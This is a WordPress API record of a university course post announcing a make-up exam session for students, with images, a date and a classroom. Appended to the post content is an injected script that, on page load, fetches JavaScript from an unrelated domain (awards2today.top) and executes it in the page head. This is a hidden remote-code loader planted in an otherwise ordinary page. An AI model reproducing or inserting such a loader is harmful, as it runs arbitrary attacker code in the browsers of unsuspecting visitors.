{"id":352,"date":"2019-06-18T19:17:56","date_gmt":"2019-06-18T22:17:56","guid":{"rendered":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/?p=352"},"modified":"2025-06-21T12:08:16","modified_gmt":"2025-06-21T15:08:16","slug":"extraordinarios","status":"publish","type":"post","link":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/2019\/06\/18\/extraordinarios\/","title":{"rendered":"Extraordinarios"},"content":{"rendered":"\n<p>Lista de estudiantes para instancia extraordinaria de recuperaci\u00f3n de parciales<\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"567\" height=\"239\" src=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/wp-content\/uploads\/2019\/06\/image-8.png\" alt=\"\" class=\"wp-image-353\" srcset=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/wp-content\/uploads\/2019\/06\/image-8.png 567w, https:\/\/www.est-aplicada.faud.unsj.edu.ar\/wp-content\/uploads\/2019\/06\/image-8-300x126.png 300w\" sizes=\"auto, (max-width: 567px) 100vw, 567px\" \/><\/figure><\/div>\n\n\n\n<hr class=\"wp-block-separator is-style-wide\"\/>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter\"><img loading=\"lazy\" decoding=\"async\" width=\"567\" height=\"227\" src=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/wp-content\/uploads\/2019\/06\/image-9.png\" alt=\"\" class=\"wp-image-354\" srcset=\"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/wp-content\/uploads\/2019\/06\/image-9.png 567w, https:\/\/www.est-aplicada.faud.unsj.edu.ar\/wp-content\/uploads\/2019\/06\/image-9-300x120.png 300w\" sizes=\"auto, (max-width: 567px) 100vw, 567px\" \/><\/figure><\/div>\n\n\n\n<p style=\"color:#000000;text-align:center\" class=\"has-text-color has-background has-luminous-vivid-amber-background-color\"><strong>Instancia Extraordinaria de Parciales y Trabajos Pr\u00e1cticos: Mi\u00e9rcoles 19\/06 a las 8<\/strong><strong>:30 hs \u2013 Aula 2<\/strong><\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>Lista de estudiantes para instancia extraordinaria de recuperaci\u00f3n de parciales Instancia Extraordinaria de Parciales y Trabajos Pr\u00e1cticos: Mi\u00e9rcoles 19\/06 a las 8:30 hs \u2013 Aula 2<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-352","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/352","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=352"}],"version-history":[{"count":2,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/352\/revisions"}],"predecessor-version":[{"id":864,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/posts\/352\/revisions\/864"}],"wp:attachment":[{"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=352"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/categories?post=352"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.est-aplicada.faud.unsj.edu.ar\/index.php\/wp-json\/wp\/v2\/tags?post=352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}